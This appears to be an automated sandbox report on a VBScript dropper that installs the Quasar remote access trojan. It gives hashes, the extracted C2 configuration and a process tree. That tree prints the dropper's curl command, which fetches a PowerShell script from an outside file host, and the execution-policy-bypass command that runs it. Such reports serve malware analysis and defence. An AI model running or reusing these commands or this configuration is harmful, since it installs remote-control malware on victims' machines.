Analysis
-
max time kernel
160s -
max time network
208s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2023, 07:46
Static task
static1
Behavioral task
behavioral1
Sample
vb.vbs
Resource
win7-20221111-en
General
-
Target
vb.vbs
-
Size
1024KB
-
MD5
ea33785b5feaade952b2768dc1b74d6d
-
SHA1
2611ef2ca512873963550e03e8da3761a3f827da
-
SHA256
664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82
-
SHA512
63745e2ee17ab5cca44eb46c5e7faecc7d2e38831d87c61262d9f4fb8d55d3891d1d9f49443dc07825273c5ca973ab3f6e964b1dae2191fd0cd306cf8a7fae35
-
SSDEEP
12:O+h3awpefnYj5H6NPnqkc+h3awpeZ9nF6NPnJ:O+9xYM5wqh+9xYZly
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
-
encryption_key
B0326395AC2D48856CAE22978A087DF5DCF5816D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp family_quasar behavioral2/memory/1644-142-0x000000000047E7AE-mapping.dmp family_quasar -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 api.ipify.org 45 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4628 set thread context of 1644 4628 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4628 powershell.exe 4628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 1644 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1644 RegAsm.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4496 wrote to memory of 4828 4496 WScript.exe 79 PID 4496 wrote to memory of 4828 4496 WScript.exe 79 PID 4828 wrote to memory of 4780 4828 cmd.exe 81 PID 4828 wrote to memory of 4780 4828 cmd.exe 81 PID 4780 wrote to memory of 4792 4780 cmd.exe 82 PID 4780 wrote to memory of 4792 4780 cmd.exe 82 PID 4496 wrote to memory of 4584 4496 WScript.exe 83 PID 4496 wrote to memory of 4584 4496 WScript.exe 83 PID 4584 wrote to memory of 1996 4584 cmd.exe 85 PID 4584 wrote to memory of 1996 4584 cmd.exe 85 PID 1996 wrote to memory of 4628 1996 cmd.exe 86 PID 1996 wrote to memory of 4628 1996 cmd.exe 86 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87 PID 4628 wrote to memory of 1644 4628 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\cmd.execmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\system32\curl.execurl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵PID:4792
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1644
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD57aad8bcb11ff3deab23cc311222fe265
SHA13d9a69c71e00aff947af949441220f18bad9e0d8
SHA256c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9